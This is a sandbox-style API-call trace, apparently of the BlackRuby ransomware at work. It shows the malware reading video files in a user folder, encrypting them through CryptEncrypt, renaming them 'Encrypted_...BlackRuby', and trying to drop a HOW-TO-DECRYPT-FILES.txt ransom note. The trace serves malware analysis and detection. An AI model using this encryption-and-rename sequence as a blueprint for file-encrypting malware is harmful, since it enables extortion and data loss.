[0063.052] GetLastError () returned 0x0 [0063.052] SetErrorMode (uMode=0x0) returned 0x1 [0063.052] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf", lpFilePart=0x0) returned 0x5d [0063.052] GetLastError () returned 0x0 [0063.052] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf", lpFilePart=0x0) returned 0x5d [0063.052] GetLastError () returned 0x0 [0063.052] SetErrorMode (uMode=0x1) returned 0x0 [0063.052] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\8x7wcqgy8saga0bmivt.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.052] GetLastError () returned 0x0 [0063.052] GetFileType (hFile=0x258) returned 0x1 [0063.052] SetErrorMode (uMode=0x0) returned 0x1 [0063.052] GetFileType (hFile=0x258) returned 0x1 [0063.052] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x694 [0063.052] GetLastError () returned 0x0 [0063.052] ReadFile (in: hFile=0x258, lpBuffer=0x1c5df1c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1c5df1c*, lpNumberOfBytesRead=0x18ec40*=0x694, lpOverlapped=0x0) returned 1 [0063.053] GetLastError () returned 0x0 [0063.053] CloseHandle (hObject=0x258) returned 1 [0063.053] GetLastError () returned 0x0 [0063.053] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf", lpFilePart=0x0) returned 0x5d [0063.053] GetLastError () returned 0x0 [0063.053] SetErrorMode (uMode=0x1) returned 0x0 [0063.053] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\8x7wcqgy8saga0bmivt.swf"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b358f60, ftCreationTime.dwHighDateTime=0x1d34e0f, ftLastAccessTime.dwLowDateTime=0x4de48f40, ftLastAccessTime.dwHighDateTime=0x1d3580d, ftLastWriteTime.dwLowDateTime=0x4de48f40, ftLastWriteTime.dwHighDateTime=0x1d3580d, nFileSizeHigh=0x0, nFileSizeLow=0x694)) returned 1 [0063.053] GetLastError () returned 0x0 [0063.053] SetErrorMode (uMode=0x0) returned 0x1 [0063.064] CryptImportKey (in: hProv=0x37c790, pbData=0x1cb99d8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360ce0) returned 1 [0063.064] GetLastError () returned 0x0 [0063.064] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.064] GetLastError () returned 0x0 [0063.069] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.069] GetLastError () returned 0x0 [0063.069] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360ee0) returned 1 [0063.069] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.069] GetLastError () returned 0x0 [0063.069] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1ce6a24*=0x1, dwFlags=0x0) returned 1 [0063.069] GetLastError () returned 0x0 [0063.069] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1ce69f0, dwFlags=0x0) returned 1 [0063.069] GetLastError () returned 0x0 [0063.069] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ce6a6c*, pdwDataLen=0x18ec30*=0x790, dwBufLen=0x790 | out: pbData=0x1ce6a6c*, pdwDataLen=0x18ec30*=0x790) returned 1 [0063.069] GetLastError () returned 0x0 [0063.069] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ce79b8*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1ce79b8*, pdwDataLen=0x18ec48*=0x10) returned 1 [0063.069] GetLastError () returned 0x0 [0063.069] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ce79e8*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1ce79e8*, pdwDataLen=0x18ec50*=0x10) returned 1 [0063.069] GetLastError () returned 0x0 [0063.069] CryptDestroyKey (hKey=0x360ce0) returned 1 [0063.069] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.069] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.069] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf", lpFilePart=0x0) returned 0x5d [0063.069] GetLastError () returned 0x0 [0063.069] SetErrorMode (uMode=0x1) returned 0x0 [0063.070] GetFileType (hFile=0x258) returned 0x1 [0063.070] GetFileType (hFile=0x258) returned 0x1 [0063.071] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\8X7wCQgy8Saga0bMiVt.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\8x7wcqgy8saga0bmivt.swf"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_QnjWCSDfNcLikJ23IbFmIi41SIvllle4HiW3TgRlozO6R.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\encrypted_qnjwcsdfnclikj23ibfmii41sivllle4hiw3tgrlozo6r.blackruby")) returned 1 [0063.072] GetLastError () returned 0xb7 [0063.073] SetErrorMode (uMode=0x0) returned 0x1 [0063.073] GetFileType (hFile=0x258) returned 0x1 [0063.073] GetFileType (hFile=0x258) returned 0x1 [0063.073] ReadFile (in: hFile=0x258, lpBuffer=0x1d095b0, nNumberOfBytesToRead=0xb36a, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1d095b0*, lpNumberOfBytesRead=0x18ec40*=0xb36a, lpOverlapped=0x0) returned 1 [0063.074] GetLastError () returned 0x0 [0063.112] CryptImportKey (in: hProv=0x37c680, pbData=0x1b86470, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360b60) returned 1 [0063.112] GetLastError () returned 0x0 [0063.112] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.112] GetLastError () returned 0x0 [0063.117] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.118] GetLastError () returned 0x0 [0063.118] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360aa0) returned 1 [0063.118] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.118] GetLastError () returned 0x0 [0063.118] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1bb34bc*=0x1, dwFlags=0x0) returned 1 [0063.118] GetLastError () returned 0x0 [0063.118] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1bb3488, dwFlags=0x0) returned 1 [0063.118] GetLastError () returned 0x0 [0063.118] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb3504*, pdwDataLen=0x18ec30*=0xb460, dwBufLen=0xb460 | out: pbData=0x1bb3504*, pdwDataLen=0x18ec30*=0xb460) returned 1 [0063.118] GetLastError () returned 0x0 [0063.118] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc9df0*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1bc9df0*, pdwDataLen=0x18ec48*=0x10) returned 1 [0063.118] GetLastError () returned 0x0 [0063.118] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bc9e20*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1bc9e20*, pdwDataLen=0x18ec50*=0x10) returned 1 [0063.118] GetLastError () returned 0x0 [0063.119] CryptDestroyKey (hKey=0x360b60) returned 1 [0063.119] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.119] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.119] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\cn9ToS9xwC5.mp4", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\cn9ToS9xwC5.mp4", lpFilePart=0x0) returned 0x55 [0063.119] GetLastError () returned 0x0 [0063.119] SetErrorMode (uMode=0x1) returned 0x0 [0063.119] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\cn9ToS9xwC5.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\cn9tos9xwc5.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.120] GetLastError () returned 0xb7 [0063.120] GetFileType (hFile=0x258) returned 0x1 [0063.120] SetErrorMode (uMode=0x0) returned 0x1 [0063.120] GetFileType (hFile=0x258) returned 0x1 [0063.122] CloseHandle (hObject=0x258) returned 1 [0063.122] GetLastError () returned 0xb7 [0063.122] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\cn9ToS9xwC5.mp4", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\cn9ToS9xwC5.mp4", lpFilePart=0x0) returned 0x55 [0063.122] GetLastError () returned 0xb7 [0063.122] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_pHwIJBjXug43XoOLa14lyFIU7CEtqIb6ewASgFxHzZ6.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_pHwIJBjXug43XoOLa14lyFIU7CEtqIb6ewASgFxHzZ6.BlackRuby", lpFilePart=0x0) returned 0x85 [0063.122] GetLastError () returned 0xb7 [0063.122] SetErrorMode (uMode=0x1) returned 0x0 [0063.122] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\cn9ToS9xwC5.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\cn9tos9xwc5.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2958dad0, ftCreationTime.dwHighDateTime=0x1d34c75, ftLastAccessTime.dwLowDateTime=0xc6ade7a0, ftLastAccessTime.dwHighDateTime=0x1d34e12, ftLastWriteTime.dwLowDateTime=0x2dd22ca0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xb470)) returned 1 [0063.122] GetLastError () returned 0xb7 [0063.122] SetErrorMode (uMode=0x0) returned 0x1 [0063.122] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\cn9ToS9xwC5.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\cn9tos9xwc5.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_pHwIJBjXug43XoOLa14lyFIU7CEtqIb6ewASgFxHzZ6.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\encrypted_phwijbjxug43xoola14lyfiu7cetqib6ewasgfxhzz6.blackruby")) returned 1 [0063.123] GetLastError () returned 0xb7 [0063.123] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5e [0063.123] GetLastError () returned 0xb7 [0063.123] SetErrorMode (uMode=0x1) returned 0x0 [0063.123] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0063.123] GetLastError () returned 0x5 [0063.124] SetErrorMode (uMode=0x0) returned 0x1 [0063.124] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", lpFilePart=0x0) returned 0x5b [0063.124] GetLastError () returned 0x5 [0063.124] SetErrorMode (uMode=0x1) returned 0x0 [0063.124] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\gjoonykackrjleaj_.flv"), fInfoLevelId=0x0, lpFileInformation=0x1bf2868 | out: lpFileInformation=0x1bf2868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x380e21a0, ftCreationTime.dwHighDateTime=0x1d34f29, ftLastAccessTime.dwLowDateTime=0xd88b9990, ftLastAccessTime.dwHighDateTime=0x1d350b0, ftLastWriteTime.dwLowDateTime=0xd88b9990, ftLastWriteTime.dwHighDateTime=0x1d350b0, nFileSizeHigh=0x0, nFileSizeLow=0x28fd)) returned 1 [0063.124] GetLastError () returned 0x5 [0063.124] SetErrorMode (uMode=0x0) returned 0x1 [0063.125] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", lpFilePart=0x0) returned 0x5b [0063.125] GetLastError () returned 0x5 [0063.125] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", lpFilePart=0x0) returned 0x5b [0063.125] GetLastError () returned 0x5 [0063.125] SetErrorMode (uMode=0x1) returned 0x0 [0063.125] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\gjoonykackrjleaj_.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.125] GetLastError () returned 0x0 [0063.125] GetFileType (hFile=0x258) returned 0x1 [0063.125] SetErrorMode (uMode=0x0) returned 0x1 [0063.125] GetFileType (hFile=0x258) returned 0x1 [0063.125] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x28fd [0063.125] GetLastError () returned 0x0 [0063.125] ReadFile (in: hFile=0x258, lpBuffer=0x1bf48b4, nNumberOfBytesToRead=0x28fd, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1bf48b4*, lpNumberOfBytesRead=0x18ec40*=0x28fd, lpOverlapped=0x0) returned 1 [0063.126] GetLastError () returned 0x0 [0063.126] CloseHandle (hObject=0x258) returned 1 [0063.126] GetLastError () returned 0x0 [0063.126] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", lpFilePart=0x0) returned 0x5b [0063.126] GetLastError () returned 0x0 [0063.126] SetErrorMode (uMode=0x1) returned 0x0 [0063.126] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\gjoonykackrjleaj_.flv"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x380e21a0, ftCreationTime.dwHighDateTime=0x1d34f29, ftLastAccessTime.dwLowDateTime=0xd88b9990, ftLastAccessTime.dwHighDateTime=0x1d350b0, ftLastWriteTime.dwLowDateTime=0xd88b9990, ftLastWriteTime.dwHighDateTime=0x1d350b0, nFileSizeHigh=0x0, nFileSizeLow=0x28fd)) returned 1 [0063.126] GetLastError () returned 0x0 [0063.126] SetErrorMode (uMode=0x0) returned 0x1 [0063.137] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c53ed4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360a20) returned 1 [0063.137] GetLastError () returned 0x0 [0063.137] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.137] GetLastError () returned 0x0 [0063.142] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.142] GetLastError () returned 0x0 [0063.142] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360ee0) returned 1 [0063.142] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.142] GetLastError () returned 0x0 [0063.142] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1c80f20*=0x1, dwFlags=0x0) returned 1 [0063.142] GetLastError () returned 0x0 [0063.142] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1c80eec, dwFlags=0x0) returned 1 [0063.142] GetLastError () returned 0x0 [0063.142] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c80f68*, pdwDataLen=0x18ec30*=0x29f0, dwBufLen=0x29f0 | out: pbData=0x1c80f68*, pdwDataLen=0x18ec30*=0x29f0) returned 1 [0063.142] GetLastError () returned 0x0 [0063.142] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c86374*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1c86374*, pdwDataLen=0x18ec48*=0x10) returned 1 [0063.142] GetLastError () returned 0x0 [0063.143] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c863a4*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1c863a4*, pdwDataLen=0x18ec50*=0x10) returned 1 [0063.143] GetLastError () returned 0x0 [0063.143] CryptDestroyKey (hKey=0x360a20) returned 1 [0063.143] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.143] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.143] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", lpFilePart=0x0) returned 0x5b [0063.143] GetLastError () returned 0x0 [0063.143] SetErrorMode (uMode=0x1) returned 0x0 [0063.144] GetFileType (hFile=0x258) returned 0x1 [0063.144] SetErrorMode (uMode=0x0) returned 0x1 [0063.144] GetFileType (hFile=0x258) returned 0x1 [0063.144] WriteFile (in: hFile=0x258, lpBuffer=0x1c8b7c0*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x18ec4c, lpOverlapped=0x0 | out: lpBuffer=0x1c8b7c0*, lpNumberOfBytesWritten=0x18ec4c*=0x2a00, lpOverlapped=0x0) returned 1 [0063.145] GetLastError () returned 0xb7 [0063.145] CloseHandle (hObject=0x258) returned 1 [0063.145] GetLastError () returned 0xb7 [0063.145] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv", lpFilePart=0x0) returned 0x5b [0063.145] GetLastError () returned 0xb7 [0063.145] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_JJNkMPLK96FLKujpehS9RtJecMGIaYCQEwtec3jeUc.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_JJNkMPLK96FLKujpehS9RtJecMGIaYCQEwtec3jeUc.BlackRuby", lpFilePart=0x0) returned 0x84 [0063.145] GetLastError () returned 0xb7 [0063.145] SetErrorMode (uMode=0x1) returned 0x0 [0063.145] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\gjoonykackrjleaj_.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x380e21a0, ftCreationTime.dwHighDateTime=0x1d34f29, ftLastAccessTime.dwLowDateTime=0xd88b9990, ftLastAccessTime.dwHighDateTime=0x1d350b0, ftLastWriteTime.dwLowDateTime=0x2dd48e00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x2a00)) returned 1 [0063.145] GetLastError () returned 0xb7 [0063.145] SetErrorMode (uMode=0x0) returned 0x1 [0063.145] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\GJoOnykacKRJlEAJ_.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\gjoonykackrjleaj_.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_JJNkMPLK96FLKujpehS9RtJecMGIaYCQEwtec3jeUc.BlackRuby" (normalized: 